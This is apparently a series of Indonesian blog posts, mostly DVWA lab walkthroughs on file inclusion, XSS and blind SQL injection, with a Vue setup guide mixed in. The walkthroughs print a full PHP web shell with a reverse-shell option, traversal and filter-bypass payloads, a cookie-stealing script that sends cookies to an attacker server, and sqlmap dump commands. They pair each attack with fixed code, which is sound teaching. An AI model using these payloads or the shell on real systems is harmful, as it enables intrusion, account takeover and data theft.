        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Selain dengan menggunakan pembatasan ekstensi tertentu. Periksa ekstensi ganda seperti namafile.php.png

Ubah izin pada folder upload sehingga file di dalamnya tidak dapat dieksekusi,

Dan jika memungkinkan, ganti nama file yang diunggah (biasanya random).

Selain itu jika form upload berupa gambar, maka lakukan re-encode pada file yang di-upload oleh client/user

Setup Vue Project

Sat, 08 Jan 2022 00:00:00 GMT

Installasi Vue js

Pertama yang dibutukan adalah node js Node js

Kemudian install Vue CLI Dokumentasi Vue v3

Bisa pakai npm atau yarn

yarn global add @vue/cli
# OR
npm install -g @vue/cli

setelah terinstal check apakah vue benar-benar terinstal dengan perintah vue --version

Installasi Project Versi 1

Kita gunakan Vite Vite is a web development build tool that allows for lightning fast serving of code due to its native ES Module import approach. Vue projects can quickly be set up with Vite by running the following commands in your terminal.

With npm:

# npm 6.x
$ npm init vite@latest <project-name> --template vue

# npm 7+, extra double-dash is needed:
$ npm init vite@latest <project-name> -- --template vue

$ cd <project-name>
$ npm install
$ npm run dev

Or with Yarn:

$ yarn create vite <project-name> --template vue
$ cd <project-name>
$ yarn
$ yarn dev

Install Bootstrap 5

Via npm: $ npm install bootstrap

const bootstrap = require('bootstrap') or import bootstrap from 'bootstrap' will load all of Bootstrap’s plugins onto a bootstrap object. The bootstrap module itself exports all of our plugins. You can manually load Bootstrap’s plugins individually by loading the /js/dist/*.js files under the package’s top-level directory.

Install Library Popper.js

Kemudian install library popper.js Popper adalah elemen pada layar yang “muncul” dari aliran alami aplikasi Anda. Contoh umum popper adalah tooltips, popovers dan drop-down.

via npm: npm i popper.js@1.14.3

Install dependencies vue-router dan axios

vue-router untuk route content pada vue axios untuk fetch data restAPI

via npm:

npm install vue-router
npm install axios

# atau sekaligus

npm install vue-router axios

Import Bootstrap pada Project

Pada folder src->main.js tambahkan kode berikut:

import 'bootstrap/dist/css/bootstrap.min.css'
import 'bootstrap/dist/js/bootstrap.min'

Installasi Project Versi 2

Ketikkan

vue create <NAMA-PROJECT>

kemudian pilih manual

Kemudian non aktifkan Linter dan Aktifkan Router

Kemudian Vue versi 3

Kemudian Enter sampai selesai

Setelah project terinstal, pindah ke folder project kemudian install dependencies yang diperlukan

DVWA Series: File Inclusion

Wed, 05 Jan 2022 00:00:00 GMT

Intro

Disclaimer

Apa itu File Inclusion

File Inclusion adalah serangan yang ditujukan kepada website yang memiliki celah keamanan yang biasanya menggunakan fungsi memanggil file melalui suatu inputan dinamis, dalam hal ini berarti seseorang dapat mengganti alamat file yang akan dipanggil dan kemudian diproses.

Efek dari serangan ini peretas dapat saja menyisipkan shell backdoor/malware, mengambil informasi penting pada server, merubah dan menghapus data

Terdapat 2 jenis file inclusion, yaitu:

Local File Inclusion (LFI), hanya bisa melihat data yang ada di dalam server tersebut.
Remote File Inclusion (RFI), kita bisa mengambil file diluar jaringan agar bisa dijalankan.

Security Level: Low


<?php



// The page we wish to display
$file = $_GET[ 'page' ];



?>

Information Gathering

Saat pertama kali kita mengakses halaman file inclusion, terdapat parameter page pada URL yang memanggil file include.php.

Kemudian jika kita klik pada salah satu dari ketiga pilihan misal: file2.php, maka nilai parameter page akan menggunakan nama file yang kita pilih.

Coba kita ubah parameter menjadi

../../../../../../../etc/passwd

maka akan muncul isi file dari passwd pada server

Hal tersebut menandakan bahwa web tersebut rentan terhadap serangan File Inclusion

Launch Attack

Karena ada 2 jenis file inclusion, kita akan mencoba keduanya.

Local File Inclusion

Contohnya kita ingin melihat isi file /etc/passwd maka kita bisa gunakan payload yang sama seperti di atas

../../../../../../../etc/passwd

Keterangan: ../ berarti kita akan mundur ke direktori sebelumnya, kita gunakan bayak ../ agar kita bisa sampai ke direktori root

Hasilnya akan sebagai berikut

Remote File Inclusion

Sebelum menjalankan remote file inclusion pada DVWA pastikan PHP function allow_url_include: Enable

Cara menghidupkannya adalah dengan mengganti konfigurasi pada php.ini Jika DVWA terinstall menggunakan docker dapat menggunakan perintah

sudo docker exec <nama container dvwa> sed -i 's/allow_url_include = Off/allow_url_include = On/g' /etc/php/7.0/apache2/php.ini
sudo docker exec <nama container dvwa> /etc/init.d/apache2 reload

Kemudian untuk menjalankan serangan, kita perlu membuat shell terlebih dahulu, lalu kita upload ke suatu server/hosting/VPS yang bisa di akses oleh server target.

Kita buat shell yang berisi kode:

<?php
/*
	Name : KNOCK KNOCK
	Owner : Naman Sahore
	Email : namansahore@gmail.com
	Published on : 30th July 2017

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

	This shell scrpit can be used for performing Remote File Inclusion
	as well as Local File Inclusion( by adding .php at the end of
	script) and getting REVERSE SHELL from vulnerable server
	or performing shell command on browser.

	HOW TO USE:
	FOR RFI
		Clear .txt extention and upload the script on a server and
		preform RFI.
	FOR LFI
		Clear .txt and add .php extention to the script and
		perform LFI by uploading shell script on a
		vulnerable server.

		Comment for more information.
*/
?>
<body style="background-color:rgb(200,200,200);">
	<form action="<?php $link = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; echo "{$link}"?>" method="POST">
	<center>
		<strong>
		</br>
		<h1 color="rgb(255, 0, 31)"><b>KNOCK KNOCK</b></h1>
		</br>
		<h2 color="rgb(255, 0, 31)"><b>SHELL</b></h2>
			COMMAND : <input type="text" name="cmd" value=""/>
			<input type="submit" name="submit" value="CMD" />
		</br></br>
		<h2 color="rgb(255, 0, 31)"><b>R SHELL USING PHP</b></h2>
		<p><b><i>*NOTE : </b>Before triggring rshell, start listening</i></p>
		</br>
		IP : <input type="text" name="ip" value=""/>&nbsp;PORT : <input type="text" name="port" value=""/>
		<input type="submit" name="submit" value="R SHELL" />
		</strong>
	</center>
	<br />
	<strong>
	<font size="5">
		<?php
		if(isset($_POST["cmd"])){
			$cmd=$_POST["cmd"];
			$output = shell_exec("{$cmd} 2>&1");
			echo $cmd."</br>"."<pre>".$output."</pre>";
		}
		if (isset($_POST["ip"]) && isset($_POST["port"])) {
			$sock="sock";
			$cmd = "php -r '$"."{$sock}"."=fsockopen("."\"{$_POST["ip"]}\"".","."{$_POST["port"]}".");shell_exec(\""."/bin/sh -i <&3 >&3 2>&3"."\");'";
			if (strlen($cmd)>66) {
				shell_exec("{$cmd} 2>&1");
			}
		}
		?>
	</font>
	</strong>
</body>

Kode shell tersebut bersumber dari https://raw.githubusercontent.com/namansahore/Remote-File-Inclusion-Shell/master/knock.txt

Simpan shell tersebut dengan ekstensi .txt Seelah diupload ke VPS/Hosting milik kalian, panggil file tersebut dengan memasukkan link pada parameter yang memiliki celah file inclusion contohnya

http://192.168.1.6/vulnerabilities/fi/?page=http://ip-address-VPS-kita/knock.txt

Maka kalau berhasil, kita bisa menjalankan RCE seperti gambar berikut:

Security Level: Medium


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

Information Gathering

Kali ini jika kita kita menggunakan ../ atau ..\" untuk LFI dan http:// atau https:// untuk RFI, maka yang teks yang mengandung kata tersebut akan dihilangkan oleh fungsi str_replace().

Untuk mengatasi hal ini saya menemukan cara, yaitu menggunakan payload berikut:

..././ -> ../

dan

hthttp://tp://ip-address/knock.txt -> http://ip-address/knock.txt

Launch Attack

Sama seperti level low, kita akan melakukan LFI dan RFI

Local File Inclusion

Pada LFI kita akan melihat isi dari file passwd menggunakan payload:

..././..././..././..././..././etc/passwd

Remote File Inclusion

Sama seperti level medium, kita perlu upload shell terlebih dahulu, kemudian kita masukkan payload sebagai berikut:

hthttp://tp://ip-address/knock.txt

Security Level: High


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

Information Gathering

Perhatikan pada source code di atas, parameter page hanya diizinkan ketika file tersebut diakses dengan diawali kata “file” atau bernama include.php. Jika salah, maka akan muncul pesan Error

Validasi ini memiliki celah, yaitu kita bisa menggunakan protokol file:// untuk melihat file yang ada di server lokal target. Server akan mengizinkannya, karena memang diawali dengan kata “file”.

Lunch Attack

Kita gunakan payload

file:///etc/passwd

Menghindari File Inclusion

`<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) { // This isn't the page we want! echo "ERROR: File not found!";
    exit;
}

?>`

DVWA Series: XSS (DOM)

Tue, 04 Jan 2022 00:00:00 GMT

Intro

Disclaimer

Apa itu XSS(Cross-Site Scripting)

Serangan Cross-Site Scripting (XSS) adalah jenis injeksi, di mana skrip berbahaya disuntikkan ke situs web yang tidak berbahaya dan tepercaya. Ada beberapa jenis serangan XSS yaitu DOM-based XSS, Reflected XSS, dan Stored XSS. Serangan XSS terjadi ketika penyerang menggunakan aplikasi web untuk mengirim kode berbahaya, umumnya dalam bentuk skrip sisi browser, ke pengguna akhir yang berbeda. Penyerang dapat menggunakan XSS untuk mengirim skrip berbahaya ke pengguna(korban yang tidak curiga). Ketika user mengeklik link yanng diberikan maka browser akan mengeksekusi skrip. Karena menganggap skrip berasal dari sumber tepercaya, skrip berbahaya dapat mengakses cookie, token sesi, atau informasi sensitif lainnya yang disimpan oleh browser dan digunakan dengan situs tersebut.

Apa itu DOM-based XSS?

Kerentanan XSS berbasis DOM biasanya muncul saat JavaScript mengambil data dari sumber yang dapat dikontrol penyerang, seperti URL, dan meneruskannya ke sink yang mendukung eksekusi kode dinamis, seperti eval() atau innerHTML. Ini memungkinkan penyerang untuk mengeksekusi JavaScript berbahaya, yang biasanya memungkinkan mereka untuk membajak akun pengguna lain. Untuk mengirimkan serangan XSS berbasis DOM, Kita perlu menempatkan data ke dalam sumber sehingga disebarkan ke sink dan menyebabkan eksekusi JavaScript.

Sumber paling umum untuk DOM XSS adalah URL, yang biasanya diakses dengan objek window.location. Penyerang dapat membuat tautan untuk mengirim korban ke halaman yang rentan dengan payload URL

Security Level: Low

<?php

# No protections, anything goes

?>

Information Gathering

Jika dilihat dari source code-nya, developer belum membuat validasi apa pun, sehingga kita bisa dengan mudah melakukan serangan. dan jika kita view source akan terlihat bahwa pilihan tersebut menggunakan Javascript.

Kemudian form ini menggunakan method GET dengan oarameter default. Jika kita melakukan request dengan menekan tombol select maka yang kita akses adalah link sbb:

http://192.168.111.130/vulnerabilities/xss_d/?default=English

Launch Attack

Langsung saja kita masukan payload sebagai berikut

<script>alert(document.cookie)</script>

Kita sisipkan pada link sbb:

http://192.168.111.130/vulnerabilities/xss_d/?default=<script>alert(document.cookie)</script>

Maka hasilnya:

Pada “kejahatan yang sebenarnya” peretas akan mengirim link XSS tersebut ke victim untuk menjalankan script yang telah ia buat.

Mari kita coba secara sederhana. sekenarionya adalah Kita(Attacker) akan mengirimkan link dengan payload berbahaya untuk mendapatkan cookie dari admin DVWA dengan memanfaatkan kerentanan XSS DOM ini.

Yang perlu kita siapkan:

Server penyerang yang nantinya akan menerima cookie. (Saya menggunakan webserver sederhana saja menggunakan simple http milik python)
Kemudian 1 device yang permissionnya hanya user biasa (nanti akan kita gunakan untuk menaikkan permissionnya menjadi admin).

Server Penyerang

Dengan menjalankan perintah

python -m http.server 8088

kemudian link yang akan kita kirim ke target adalah

http://192.168.111.130/vulnerabilities/xss_d/?default=<script>window.location='http://192.168.1.5:8088/?cookie='+document.cookie</script>

Penjelasan: window.location adalah untuk meredirect ke halaman/web penyerang http://192.168.1.5:8088 adalah alamat dari web penyerang document.cookie adalah untuk mengambil cookie.

Sehingga ketika korban mengeklik link tersebut maka pada log server penyerang muncul sbb:

Kemudian cookie tersebut kita gunakan untuk mencuri akun tersebut. Perhatikan bahwa kita login menggunakan akun denganusername “pablo”.

Kita akan mengganti cookie tersebut dengan apa yang suda kita dapat. sehingga menjadi:

Kemudian kita rfresh halaman tersebut Duarrrr. Kita sekarang menjadi admin.

Begitulah kira-kira.

Security Level: Medium

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];

    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

Information Gathering

Perhatikan pada source code, bahwa terdapat validasi jika mengandung kata “<script” pada nilai parameter default, maka akan di redirect ke parameter ?default=English.

Untuk mengatasi ini kita harus mencari cara lain untuk menjalankan JavaScript tanpa menggunakan tag <script>

Kita bisa menggunakan payload

<img src/onerror=alert(document.cookie)>

atau menggunakan onload pada tag body

</select><body onload="alert('Hacked')">

untuk variasi payload bisa dilihat di https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Tetapi untuk melakukan hal tersebut kita harus tutup terlebih dahulu tag sebelumnya (di sini <select>) agar script yang kita inject bisa berjalan.

Sehingga muncul

Yang terjadi adalah tag select akan tertutup dan tag img akan di masukkan dan ketika terjadi error pada source akan menampilkan cookie.

Security Level: High

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

Information Gathering

Pada level ini, developer sekarang menentukan whitelist untuk bahasa yang diperbolehkant. Kita harus cari jalan agar kode tidak tereksekusi di server(hanya di client).

setelah saya baca baca di https://owasp.org/www-community/attacks/DOM_Based_XSS

kita bisa menggunakan payload

#<script>alert(document.cookie)</script>

http://192.168.111.130/vulnerabilities/xss_d/?default=English#<script>alert(document.cookie)</script>

atau

&<script>alert(document.cookie)</script>

http://192.168.111.130/vulnerabilities/xss_d/?default=English&<script>alert(document.cookie)</script>

Teknik untuk menghindari pengiriman payload ke server bergantung pada fakta bahwa fragmen URI (bagian dalam URI setelah ”#”) tidak dikirim ke server oleh browser.

Menghindari XSS DOM

<?php

# Don't need to do anything, protction handled on the client side

?>

Konten yang diambil dari URL dikodekan secara default oleh sebagian besar browser yang mencegah JavaScript yang diinject untuk dieksekusi. Maka ketika kita eksekusi payload, payload tersebut akan terencode.

lengkapnya baca di https://owasp.org/www-community/attacks/xss/

DVWA Series: XSS (Reflected)

Tue, 04 Jan 2022 00:00:00 GMT

Intro

Disclaimer

Apa itu XSS(Cross-Site Scripting)

Apa itu Reflected XSS?

Reflected Attackn adalah serangan di mana acript yang diinject dipantulkan dari server web, seperti dalam pesan kesalahan, hasil pencarian, atau respons lain apa pun yang menyertakan beberapa atau semua input yang dikirim ke server sebagai bagian dari permintaan.

Security Level: Low

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

Information Gathering

Pada halaman web tersebut tedapat form yang bisa kita submit. Jika kita mengisi nilai totooo <'"/>, maka akan muncul seperti berikut:

Dan form tesebut menggunakan method GET. kemudian ketika kita melihat source nya special character yang kita input tidak ter encode dan pada file php tersebut tidak ada validasi yang melarang penggunaan kata tag script.

Sehingga kita bisa lakukan serangan.

Serang

Kita tinggal ketikkan kode berikut pada form input

<script>alert(document.cookie)</script>

maka hasilnya:

dan kalau kita lihat sourcenya, apa yang kita inputkan itu langsung ditampilkan oleh website tersebut.

Untuk real scenarionya sama dengan yang DOM, jadi silakan liat pada artikel saya yang membahas tentang XSS DOM

Security Level: Medium

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

Information Gathering

Terdapat validasi untuk menghilangkan tag <script> pada inputan. Jika kita menggunakan payload sebelumnya, maka hasilnya akan seperti berikut:

tag scrip yang pertama akan hilang sehingga script tidak bisa jalan. namun masih bisa diakalin, karena tag <script> direplace menjadi kosong (”) kita bisa gunakan payload

<scr<script>ipt>alert(document.cookie)</script>

atau bisa juga menggunakan payload yang tidak mengandung kata script seperti:

<body onload="alert(document.cookie)">

atau

<img src/onerror=alert(document.cookie)>

Security Level: High

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

Information Gathering

Pada source code di atas terlihat bahwa pattern "<s*c*r*i*p*t" tidak diizinkan. Sehingga kita tidak bisa menggunakan payload yang mengandung tag <script. kita bisa pakai tag img atau body atau pakai tag lain, dapat dilihat di cheat sheet berikut https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Launch Attack

<body onload="alert(document.cookie)">

atau

<img src/onerror=alert(document.cookie)>

Menghindari Reflected XSS

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Menggunakan fungsi PHP bawaan (seperti “htmlspecialchars()”), memungkinkan untuk meng-escape nilai apa pun yang di input.

DVWA Series: XSS (Stored)

Tue, 04 Jan 2022 00:00:00 GMT

Intro

Disclaimer

Apa itu XSS(Cross-Site Scripting)

Apa itu Stored XSS?\

Serangan stored XSS adalah di mana script yang diinject disimpan secara permanen di server target, seperti di database, di forum pesan, log pengunjung, kolom komentar, dll. Korban kemudian mengeksekusi script berbahaya dari server ketika membuka halaman yang mengandung script berbahaya tersebut.

Stored XSS dianggap sangat berbahaya karena siapaun yang mengunjungui halaman yang mengandung script berbahaya akan terkena. https://portswigger.net/web-security/cross-site-scripting/stored

Security Level: Low

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

Information Gathering

Secara normal isi dari halaman seperti berikut

Kemudian kita coba isi pada bagian message dengan tag <script></script> dan kita coba juga dengan form Name. Maka ketika kita view source:

Tag tersebut tidak terencode. Maka kita bisa langsung melakukan serangan pada kolom nama maupun message (pada kolom nama dan message, kita harus ganti maxlength dengan inspet element terlebih dahulu).

Launch Attack

<script>alert(document.cookie)</script>

atau jika ingin meredirect ke web kita juga bisa

<script>window.location='http://192.168.1.5:8088/?cookie='+document.cookie</script>

Inspect element:

Hasilnya:

Atau kita bisa menggunakan Burpsuite. Pertama kita intercept -> ganti isian nama dengan payload kemudian kita forward

Security Level: Medium

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

Information Gathering

Setelah saya coba-coba dan melihat source code pada form Name, tag <script> tidak diizinkan. Sedangkan pada form Message awalan tag (yang mengandung <) juga tidak diizinkan.

Sepertinya celah XSS terdapat pada form Name, karena kita bisa saja memanggil JavaScript tanpa menggunakan tag <script>. Tetapi maksimal inputan pada form Name ini hanya 10 karakter. Untuk mengatasi hal tersebut kita bisa merubah nilai maxlength nya dengan menggunakan inspect element atau bisa menggunakan burpsuite.

Launch Attack

Payload:

<scr<script>ipt>alert(document.cookie)</script>

atau

<SCRIPT>alert(document.cookie)</script>

atau

<body onload="alert(document.cookie)">

atau

<img src/onerror=alert(document.cookie)>

Security Level: High

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

Pada source code di atas terlihat bahwa pattern "<s*c*r*i*p*t" tidak diizinkan pada form Name. Sehingga kita tidak bisa menggunakan payload yang mengandung tag <script. kita bisa pakai tag img atau body atau pakai tag lain, dapat dilihat di cheat sheet berikut https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Launch Attack

Payload yang saya pakai:

<img src/onerror=alert(document.cookie)>

Menghindari Stored XSS

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Melakukan sanitasi dan escape string

DVWA Series: SQL Injection (BLIND)

Mon, 03 Jan 2022 00:00:00 GMT

Intro

Disclaimer

Apa itu Blind SQL Injection?

Blind SQL Injection adalah salah satu teknik eksploitasi database yang berbeda dengan SQL injection biasa, di mana pada SQL Injection biasa akan mengeluarkan sebuah value, akan tetapi pada blind SQL injection tidak akan mengeluarkan value apa pun. Untuk mengetahui value tersebut kita harus melakukan trial and error untuk menguji benar atau salahnyanya value tersebut.

Security Level: Low

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Information Gathering

Setelah dicoba-coba (trial and error). akhirnya dapat kesimpulan bahwa pada level ini tidak ada validasi apa pun untuk pada inputan yang digunakan untuk menjalankan query. Ketika kita menginputkan 1 (true), maka akan tampil seperti berikut:

Jika saya coba membuatnya error (false), maka akan tampil seperti berikut:

Ketika saya mencoba menyisipkan payload seperti berikut(sama pada sql injection sebelumnay), maka hasilnya akan true. Ini berarti form tersebut memiliki celah Blind SQL Injection.

Launch Attack

Untuk lebih mudah saya menggunakan SQLMap

sqlmap -r teq.txt --dbs

atau

sqlmap -u "192.168.1.6/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=dnluhm0tj00oo3g678re07cvl0; security=low" --dbs

Selanjutnya silahkan menggunakan perintah yang sama pada swl injection biasa

Security Level: Medium

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?>

Information Gathering

Pada level ini menggunakan methot POST sehingga kita perlu tools bernama burpsuite.

Kita coba buat error

Dan ketika saya menggunakan payload berikut, maka hasilnya akan true:

1 or 1 = 1

Sehingga dapat disimpulkan terdapat celah Blind SQL Injection.

Launch Attack

Menggunakan SQLMap

sqlmap -r req.txt -D dvwa -T users --dump

atau jika ingin lebih cepat

sqlmap -r req.txt -D dvwa -T users --dump --threads 2

Security Level: High

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Information gathering

